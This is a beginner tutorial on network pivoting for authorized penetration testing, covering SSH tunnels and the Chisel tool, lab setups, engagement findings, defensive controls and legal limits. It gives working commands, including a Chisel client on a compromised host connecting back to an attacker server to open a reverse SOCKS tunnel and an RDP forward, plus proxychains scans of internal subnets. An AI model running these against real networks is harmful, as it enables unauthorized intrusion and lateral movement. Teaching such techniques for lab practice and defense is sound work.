Pivoting Within a Network: Getting Started With Chisel (Beginner Guide)

CyberLord Team

Pivoting Within a Network: Getting Started With Chisel (Beginner Guide)

Network pivoting is a fundamental technique in authorized penetration testing. Once you have established a foothold on a system inside a network, pivoting lets you reach other systems that would not normally be accessible from your external attack position. Understanding pivoting — and the tools used to accomplish it — is essential for anyone pursuing a career in offensive security or wanting to understand how real-world attackers navigate corporate environments.

This guide covers the core concepts of pivoting, where Chisel fits in the toolset, practical usage in a lab environment, and the ethical and legal boundaries that must always govern this work.

What Is Network Pivoting?

In most corporate networks, there is no direct path from the internet to critical internal systems. Segmentation controls — firewalls, VLANs, DMZs, zero-trust architecture — are intended to ensure that even if an attacker breaches an internet-facing system, they cannot freely roam the internal network.

Pivoting is the technique attackers and authorized pentesters use to navigate past these controls after gaining access to an initial compromised host. The pivoting host (your foothold) acts as a relay: traffic from your attack machine routes through it to reach internal targets that have no direct external exposure.

Why It Matters for Security Testing

Pivoting tests the reality of an organization's segmentation strategy. Many organizations assume that network isolation protects internal systems — but if a single internet-facing host is compromised and segmentation is weak, an attacker can reach payroll systems, domain controllers, and databases that were never intended to be exposed to external threats.

Testing for this realistically requires simulating the post-exploitation pivot — exactly what authorized red team engagements do.

Types of Pivoting Techniques

Before diving into Chisel specifically, it helps to understand the landscape of pivoting techniques:

Port Forwarding (SSH Tunneling)

The most basic form: use SSH to forward a specific port on the compromised host to a specific port on an internal target. Useful for one-off access to a single service (e.g., accessing an internal web admin panel through a compromised server). Limited in flexibility — you need to know the exact target and port in advance.

# Forward local port 8080 to internal target port 80 via compromised host
ssh -L 8080:internal-target:80 user@compromised-host

Dynamic SOCKS Proxy (SSH)

A more flexible approach: SSH creates a SOCKS5 proxy on your local machine. Traffic routed through the proxy is forwarded through the compromised host to any internal destination. Tools like Proxychains integrate with SOCKS proxies to route tool traffic through the pivot.

# Create SOCKS5 proxy on local port 1080 via compromised host
ssh -D 1080 user@compromised-host

Reverse Tunnels

When the compromised host cannot receive inbound connections (it is behind a strict outbound-only firewall), reverse tunnels have the compromised host initiate the connection back to your attack machine and then relay traffic through that outbound connection.

VPN-Style Pivoting (Ligolo-ng)

Modern tools like Ligolo-ng create a full layer-3 tunnel from your attack machine to the internal network, making the internal subnet appear as if it were directly routed to your attack machine. This is the most flexible approach and is increasingly favored in complex engagements over SOCKS proxy chains.

Where Chisel Fits In

Chisel is an HTTP/HTTPS tunneling tool that creates a reliable pivot channel through firewalls that block non-HTTP traffic. It operates as a client/server architecture:

  • Chisel server: Runs on your attack machine (or a cloud-hosted relay), listening for incoming connections.
  • Chisel client: Runs on the compromised host inside the target network, connecting outbound to the Chisel server.

Because Chisel uses standard HTTP/HTTPS traffic, it traverses most outbound web filtering rules that would block direct TCP tunnels or reverse shell connections on non-standard ports. This makes it particularly valuable in environments with strict egress filtering.

What Chisel Is Used to Test

In an authorized engagement, Chisel helps answer specific security questions:

  • Egress filtering effectiveness: Can an outbound HTTPS connection from a compromised internal host reach an external server? If yes, data exfiltration is likely feasible from that host.
  • Internal service exposure: Once the pivot is established, can you reach internal web admin interfaces, database ports, and API endpoints from outside the network? This reveals what an attacker with the same foothold could access.
  • Segmentation boundaries: Does the compromised host have network access to segments it should not (e.g., can a web server in the DMZ reach the domain controller in the internal network)?
  • Detection capabilities: Does the HTTPS tunnel trigger any IDS/IPS alerts, SIEM rules, or EDR detections? Absence of alerts is itself a finding — it means the organization cannot detect this common attacker technique.

Basic Chisel Setup and Commands

Chisel is available as a single binary for Linux, Windows, and macOS. In an engagement, you would typically transfer the appropriate client binary to the compromised host.

Starting the Server (Attack Machine)

# Start Chisel server in reverse mode on port 8443
./chisel server --reverse --port 8443

The --reverse flag tells the server to accept inbound connections from clients that will then register remote port forwards.

Starting the Client (Compromised Host)

# Connect back to Chisel server and forward all traffic through a SOCKS5 proxy
./chisel client https://attack-machine:8443 R:socks

The R:socks argument tells the server to create a SOCKS5 proxy port (default 1080) on the server side. All traffic routed through that SOCKS5 proxy will traverse the tunnel to the internal network from the compromised client's perspective.

Using the Tunnel (Attack Machine)

Once the SOCKS5 proxy is live, use Proxychains to route tool traffic through it:

# Scan an internal subnet through the Chisel SOCKS5 proxy
proxychains nmap -sT -Pn 10.10.10.0/24

# Access an internal web service through the tunnel
proxychains curl http://internal-admin-panel/

Direct Port Forwarding (Without SOCKS)

If you need access to a specific internal port rather than a full proxy:

# Forward attack machine port 3389 → internal RDP server via compromised host
./chisel client https://attack-machine:8443 R:3389:internal-target:3389

This makes the internal RDP service available at localhost:3389 on your attack machine.

Setting Up a Safe Lab Environment

Never practice pivoting techniques on networks you do not own or have explicit written permission to test. The most effective way to build skills safely is in an isolated lab environment:

Option 1: Local VM Lab

Build a multi-machine virtual network:

  • Attack machine: Kali Linux or Parrot OS
  • Compromised host (pivot): A Linux or Windows VM with limited outbound rules
  • Internal target: A VM on a separate virtual network that the attack machine cannot reach directly

Tools like VMware Workstation and VirtualBox support multiple virtual networks, allowing you to simulate realistic segmented environments without real hardware.

Option 2: HackTheBox and TryHackMe

Both platforms offer machine networks where pivoting is an intended challenge. HackTheBox Pro Labs (Offshore, RastaLabs, Cybernetics) are specifically designed for multi-hop pivoting practice in realistic corporate network simulations. These are legal, safe, and designed for skill development.

Option 3: Vulnerable-By-Design Lab Networks

Projects like GOAD (Game of Active Directory) and Proxmox-based home lab builds give you a realistic Active Directory environment with multiple subnets to practice full kill-chain attacks including pivoting, lateral movement, and domain compromise.

What Findings in a Real Engagement Look Like

When pivoting reveals security issues in an authorized assessment, the findings typically fall into a few categories:

Weak Segmentation (Critical)

If you can reach domain controllers, database servers, or HR systems from a compromised DMZ host, segmentation has failed. The finding documents: the source of compromise, the pivot path, the internal systems reached, the data accessible, and the expected business impact.

Permissive Outbound Filtering (High)

If HTTPS connections to arbitrary external IPs succeed from internal hosts, data exfiltration and command-and-control (C2) is feasible. Recommendation: restrict outbound HTTPS to approved destinations via proxy, inspect encrypted traffic with TLS inspection, and log egress anomalies.

No Detection of Tunnel Activity (Medium-High)

If the tunnel runs for the duration of the engagement without triggering a SIEM alert or EDR event, the blue team has a detection gap. The recommendation is to implement behavioral rules watching for unusual HTTPS persistence from internal hosts and traffic to uncategorized destinations.

Defensive Takeaways

Understanding how Chisel-based pivoting works informs specific defensive controls:

  • Enforce outbound proxying: Route all outbound HTTP/HTTPS through a web proxy (Zscaler, Bluecoat, Squid with TLS inspection). This allows category filtering, content inspection, and logging that makes C2 tunnels visible.
  • Segment properly — and test it: Deploy VLANs and firewall rules between DMZ, user network, and server segments. Then verify they work as expected through authorized testing — many organizations have rules on paper that are not enforced in practice.
  • Monitor for unusual persistence: A client making a sustained HTTPS connection to an external IP for hours is anomalous. Behavioral rules in your SIEM or NDR platform should flag this.
  • Harden endpoint egress: Where possible, restrict which processes can make outbound network connections using application control policies (Windows Defender Application Control, AppLocker, or commercial EDR).

Ethics and Legal Framework

Pivoting techniques are dual-use by nature — the same tool that helps a pentester validate segmentation can be used by an attacker to move through a network. The only ethical and legal use of Chisel in a real network is under explicit written authorization:

  • A signed Statement of Work that includes the source IP/systems, permitted pivot paths, and allowed tools
  • A defined timeframe for testing
  • A communication protocol for stopping testing if something unexpected occurs (a "kill switch" agreement)
  • Logging and change-control expectations defined with the client

Without this framework, running Chisel on any network you do not personally own is a violation of the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent legislation globally. Intent ("I was learning," "I was testing my own company") does not substitute for documented authorization.

Summary

  • Network pivoting routes traffic through a compromised host to reach otherwise inaccessible internal systems, simulating real attacker behavior post-compromise.
  • Chisel creates HTTP/HTTPS tunnels that bypass egress filtering, making it valuable in environments with strict outbound firewall rules.
  • In an authorized engagement, Chisel-based pivoting tests segmentation effectiveness, egress filtering, and the organization's ability to detect tunnel-based C2 activity.
  • Safe practice requires isolated lab environments, purpose-built platforms like HackTheBox, or explicitly authorized test environments.
  • Every real-network use of pivoting requires a signed authorization document — without it, the activity is illegal regardless of intent.

Frequently Asked Questions

What is the difference between Chisel and SSH tunneling? SSH tunneling requires SSH access to the pivot host, which is often restricted or detectable. Chisel uses HTTP/HTTPS, which is almost always allowed outbound and blends with legitimate web traffic. Chisel is also a single binary, making it easier to deploy to compromised hosts during an engagement.

Is Chisel the same as Ligolo-ng? Both are pivoting tools, but Ligolo-ng creates a full TUN interface that makes the internal subnet appear as a directly routed network on your attack machine. Chisel creates a SOCKS proxy or port-forward tunnel. Ligolo-ng is generally more convenient for complex, multi-subnet scenarios; Chisel is simpler for targeted port forwarding.

What certifications teach network pivoting? The OSCP (Offensive Security Certified Professional) exam includes multi-hop pivoting scenarios. PNPT (Practical Network Penetration Tester), eJPT, and eCPPT also cover pivoting in varying depth. HackTheBox Pro Labs (Offshore, RastaLabs) are excellent for realistic practice beyond single-machine challenges.

How do defenders detect Chisel tunnels? Indicators include: sustained HTTPS connections to unusual external IPs from internal hosts, processes making unexpected outbound connections (detected by EDR), unusual data volumes from hosts with no legitimate reason for external connections, and DNS queries for dynamically generated domains. TLS inspection at the proxy layer is the most reliable detection point.